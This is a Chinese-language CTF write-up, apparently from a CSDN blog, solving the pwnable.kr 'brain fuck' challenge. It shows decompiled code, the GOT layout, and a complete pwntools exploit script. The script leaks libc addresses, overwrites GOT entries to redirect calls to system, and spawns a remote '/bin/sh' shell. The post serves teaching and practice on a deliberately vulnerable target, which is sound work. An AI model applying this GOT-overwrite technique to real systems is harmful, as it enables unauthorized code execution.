pwnable.kr - brain fuck

最新推荐文章于 2022-09-09 20:02:25 发布
最新推荐文章于 2022-09-09 20:02:25 发布
阅读量802 收藏
点赞数
分类专栏: pwn 文章标签: pwnable.kr brainfuck
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plus_re/article/details/79452010
版权

题目简介

Brain fuck 是 pwnable.kr 第二阶段的第一道题,考察了覆些 GOT 表等知识点。题目信息如下:

题目信息

分析

将下载得到的 bf 文件拖进 IDA 中查看,发现程序主要由 main 函数以及 do_brainfuck 函数组成,且没有开启 PIE。

main 函数如下:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  size_t i; // [esp+28h] [ebp-40Ch]
  char s[1024]; // [esp+2Ch] [ebp-408h]
  unsigned int v6; // [esp+42Ch] [ebp-8h]

  v6 = __readgsdword(0x14u);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  p = (int)&tape;
  puts("welcome to brainfuck testing system!!");
  puts("type some brainfuck instructions except [ ]");
  memset(s, 0, 0x400u);
  fgets(s, 1024, stdin);
  for ( i = 0; i < strlen(s); ++i )
    do_brainfuck(s[i]);
  return 0;
}

do_brainfuck 函数如下:

int __cdecl do_brainfuck(char a1)
{
  int result; // eax
  _BYTE *v2; // ebx

  result = a1;
  switch ( a1 )
  {
    case 43:
      result = p;
      ++*(_BYTE *)p;
      break;
    case 44:
      v2 = (_BYTE *)p;
      result = getchar();
      *v2 = result;
      break;
    case 45:
      result = p;
      --*(_BYTE *)p;
      break;
    case 46:
      result = putchar(*(char *)p);
      break;
    case 60:
      result = p-- - 1;
      break;
    case 62:
      result = p++ + 1; 
      break;
    case 91:
      result = puts("[ and ] not supported.");
      break;
    default:
      return result;
  }
  return result;
}

分析 do_brainfuck 函数可知,该函数实现了一个 brainfuck 语言的解释器,但是存在任意读写漏洞。因为 tape 在 bss 段,地址为 0x0804A0A0,与 GOT 表 相邻。因此通过控制 p 的值,可以实现对 GOT 表的任意读写。

GOT 表如下:

.got.plt:0804A000 ; ===========================================================================
.got.plt:0804A000
.got.plt:0804A000 ; Segment type: Pure data
.got.plt:0804A000 ; Segment permissions: Read/Write
.got.plt:0804A000 _got_plt        segment dword public 'DATA' use32
.got.plt:0804A000                 assume cs:_got_plt
.got.plt:0804A000                 ;org 804A000h
.got.plt:0804A000 _GLOBAL_OFFSET_TABLE_ dd offset _DYNAMIC
.got.plt:0804A004 dword_804A004   dd 0                    ; DATA XREF: sub_8048430↑r
.got.plt:0804A008 ; int (*dword_804A008)(void)
.got.plt:0804A008 dword_804A008   dd 0                    ; DATA XREF: sub_8048430+6↑r
.got.plt:0804A00C off_804A00C     dd offset getchar       ; DATA XREF: _getchar↑r
.got.plt:0804A010 off_804A010     dd offset fgets         ; DATA XREF: _fgets↑r
.got.plt:0804A014 off_804A014     dd offset __stack_chk_fail
.got.plt:0804A014                                         ; DATA XREF: ___stack_chk_fail↑r
.got.plt:0804A018 off_804A018     dd offset puts          ; DATA XREF: _puts↑r
.got.plt:0804A01C off_804A01C     dd offset __gmon_start__
.got.plt:0804A01C                                         ; DATA XREF: ___gmon_start__↑r
.got.plt:0804A020 off_804A020     dd offset strlen        ; DATA XREF: _strlen↑r
.got.plt:0804A024 off_804A024     dd offset __libc_start_main
.got.plt:0804A024                                         ; DATA XREF: ___libc_start_main↑r
.got.plt:0804A028 off_804A028     dd offset setvbuf       ; DATA XREF: _setvbuf↑r
.got.plt:0804A02C off_804A02C     dd offset memset        ; DATA XREF: _memset↑r
.got.plt:0804A030 off_804A030     dd offset putchar       ; DATA XREF: _putchar↑r
.got.plt:0804A030 _got_plt        ends
.got.plt:0804A030

具体解题思路是,首先控制 p 的值泄露出 puts 的地址,从而求得 gets 以及 system 的地址(题目给出了 so 文件)。然后改写 putchar 的 got 表项为 main 函数地址,改写 memset 的 got 表项为 gets 地址,改写 fgets 的 got 表项为 system 地址。接着再次进入 main 函数(通过改写后的 putchar),通过 gets(即改写后的 memset)读入 /bin/sh,最后调用 system(即改写后的 fgets)。

writeup

from pwn import *

context(os='linux', arch='i386', log_level='info')

DEBUG = 0
if DEBUG:
    p = process('./bf')
    so = ELF('/lib32/libc.so.6')
else:
    p = remote('pwnable.kr', 9001)
    so = ELF('./bf_libc.so')

ins =  0x88 * '<' + '.>.>.>.>'   # get puts_addr
ins += 0x14 * '>' + ',>,>,>,>'   # change putchar_got to main
ins += 0x8  * '<' + ',>,>,>,>'   # change memset_got to gets
ins += 0x20 * '<' + ',>,>,>,>'   # change fgets_got to system
ins += '.'  # return to main

# print ins

p.recvuntil('[ ]\n')
p.sendline(ins)

leak1 = p.recv(1)
leak = leak1 + p.recv(3)
puts_addr = u32(leak)
log.info('puts_addr = ' + hex(puts_addr))

gets_addr = puts_addr + (so.symbols['gets'] - so.symbols['puts'])
log.info('gets_addr = ' + hex(gets_addr))
system_addr = puts_addr + (so.symbols['system'] - so.symbols['puts'])
log.info('system_addr = ' + hex(system_addr))

main_addr = 0x8048671

shellcode = p32(main_addr) + p32(gets_addr) + p32(system_addr) + '/bin/sh\x00'
p.sendline(shellcode)

p.interactive()
加号减减号
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Brainfuck:一个简单的 Brainfuck JS 解释器
07-23
脑残 一个简单的 Brainfuck JS 解释器 什么是脑筋急转弯? “Brainfuck 是一种以极简主义着称的深奥编程语言。该语言仅由八个简单的命令和一个指令指针组成。然而,它被证明是图灵完备的。它旨在挑战和娱乐程序员,而不是被制造出来适合实际使用。它由 Urban Müller 于 1993 年创建。该语言的名称是对粗俗术语“brain fuck”的引用,它指的是非常复杂或不寻常的事情,以至于超出了人们的理解范围”( )。 命令是什么? 脑残 C > ++ptr; < --ptr; + ++*ptr; - --*ptr; [ 而 (*ptr) { ] } . putchar(*ptr); , *ptr = getchar();
Brainfuck语言入门
热门推荐
nameofcsdn的博客
11-29 1万+
Brainfuck语言是一种很图灵机的图灵机。 这个编程语言只有8种有效字符,其实就是8种指令: 字符 含义 > 指针加一 < 指针减一 + 指针指向的字节的值加一 - 指针指向的字节的值减一 . 输出指针指向的单元内容(ASCⅡ码)
栈溢出攻击2——绕过Canary通过后门函数拿到shell
学习记录
09-16 2068
博文中的程序:点击下载 提取码:qbdd   能看到这篇博客,我相信大家对栈溢出攻击已经有了一定的了解。一个入门级的题目就是程序中本身有后门函数,我们用后门函数的入口地址覆盖当前正在执行函数的返回地址,这样当前函数执行结束之后,就会跳到后门函数执行,从而达到攻击的目的。那么我们有没有办法防范这种攻击呢?答案是有的,我们可以不使用像read、scanf等有缓冲区溢出漏洞的函数,当然,如果无法避免这些函数的使用,我们还可以使用canary机制来保护我们的程序。canary的英文名称是金丝雀,它可以用来判断我们
cgfsb-格式化字符串
playmaker的博客
06-08 620
cgfsb-格式化字符串漏洞 程序大致逻辑如下 v8 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); buf = 0; v5 = 0; v6 = 0; memset(&s, 0, 0x64u); puts("please tell me your...
2021_9_20_name_your_cat
m0_51187558的博客
09-22 232
前言 每日一题的第三题,主要是对于上一道题的一个巩固和补充,涉及到了一点函数执行流的控制,但是总体还是比较简单。 漏洞点分析 在上一道题目里我们遇见了一个溢出数组变量的内存空间的漏洞,一般来说我们称这种类型漏洞为数组越界漏洞(当然,漏洞的俗名只是方便大家归类整理与交流,自己的另起说法也是可行的)。 但是稍微回想一下,上一道题的关键是通过数组越界修改v2变量的值,程序设定好了,只要v2被更改为这个值,我们就能获得flag。 然而在上上道,也就是nc中,我们提到过,想要做出pwn题,需要想方设法使程序执行sys
Reversing.kr--crackme200.rar
09-30
Reversing.kr--crackme200.rar
mirror.enha.kr-crx插件
04-04
在enhawiki镜像中搜索关键字(http://mirror.enha.kr)! v1.21 可以在黑暗屏幕上查看的单独选项 ...
dark.enha.kr-crx插件
04-04
语言:한국어 在elecawiki(暗)镜像中搜索关键字(http://dark.enha.kr)! v1.0 释放
烧脑语言Brainfuck及其加减乘除
个人笔记
09-09 2462
Brainfuck语言介绍,编译器代码,实现加减乘除。
The use of FS/GS registers
CoryXie的专栏
01-29 3603
博注:偶很少弄Windows的东西,偶尔因为RE了ntoskrnl.exe->ntoskrnl.c,发现里面很多__readfsdword(32),__readfsdword(292)之类的调用,因此Google了一下,下面是记录,不敢说原创,故都列出了原文地址。 1.What is the “FS”/“GS” register intended for? http://stackov
Brain-Fuck:只是一个剧本
03-11
脑干- 只是一个脚本:P 钥匙 描述 , 获得输入字符。 。 打印数据字符。 ` 通过将每个字符的asci代码设置在“图形”下方来获取输入字符串。 < 将头/指针向左移动。 > 向右移动头/指针。 伏特 向下移动头/指针。 ^ 将头/指针向上移动。 [ 循环遍历代码,直到当前头/指针的数据为0。 ] 循环结束。 -- 从当前表头/指针的数据中减去1,则为0,然后将其变为255。 + 将1添加到当前表头的数据/指针的数据,即255,然后将其变为0。 程式码范例 V\`[.^] 这将得到一个字符串并向后打印出来! V\`[^][.V] 这做同样的事情,但可以正常打印!
简单的brainfuck解码工具
06-15
简单的brainfuck解码工具,将brainfuck编码输入即可获得明文。
pwnable brain fuck(bss段的用途)
九层台
09-26 636
题目链接传送门 这里题目跟网鼎杯线下赛的一个pwn有些相似。 输入一些字符可以控制一个指针,可以向这个指针指向的地址处写数据。 首先要知道bss段里面有什么。 在这道题里面的p指针的更高地址处是stdin,stdout,stderr然后是函数的got表,这里可以控制指针p泄露和修改got表。 #coding=utf-8 from pwn import * p=0x0804a0a0 putcha...
pwnable 笔记 Rookiss - brain fuck - 150 pt
HiTaQini
12-15 3056
终于打到第二关了... 这题考察GOT覆写
BrainFuck 人肉编译规则
fushuangdage的博客
11-08 6002
简介Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。 也算是一个奇葩语言吧,不过好像没啥实际作用,因为太轻量了,只能用于表示简单的某些简短的字符串(推荐装逼表白使用吧,其它大概没啥卵用),解析规则还挺有意思的,好久没写博客了,记录一下上午研究成果.
php非法指令,RCTF2020部分PWN题解
weixin_29461699的博客
03-26 625
前言上周肝了两天RCTF,最近闲下来好好做了下其中的几道题,这里写一下它们的题解note程序逻辑很典型的菜单题,bss处有个全局变量被设置为0x996,在New的时候会比较0x359 * sz和global_money前者小于等于后者方可进行calloc分配,这里很明显可以通过0x10000000000000000/0x359+1进行绕过,当然,因为这个size过大,calloc分配失败会返回0,...
[ctfhub.pwn] 第12-14题
weixin_52640415的博客
09-06 637
ctfhub.pwn习题集
手动实现一门图灵完备的编程语言——Brainfuck
麒思妙想
08-24 3557
>++++++++[<+++++++++++++>-]<.---.+++++++..+++.>++++++++[<---------->-]<+.>++++++++[<+++++++++++>-]<-.--------.+++.------.--------.>++++++[<----------->-]<-. 如果你看了上面这串字符,并知道它代表什么,那么相信你在你读完这篇文章后,你会理解...
pwnable.kr brainfuck writeup
jmp esp
03-28 1745
题目I made a simple brain-fuck language emulation program written in C. The [ ] commands are not implemented yet. However the rest functionality seems working fine. Find a bug and exploit it to get a
kr-print-designer
最新发布
11-25
kr-print-designer是一个基于Vue、ElementUi、Lodop的打印模板设计器,它可以帮助用户实现打印模板的设计、预览和打印功能。kr-print-designer的主要特点包括: 1. 支持多种打印模板类型,包括A4、A5、小票等。 2. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值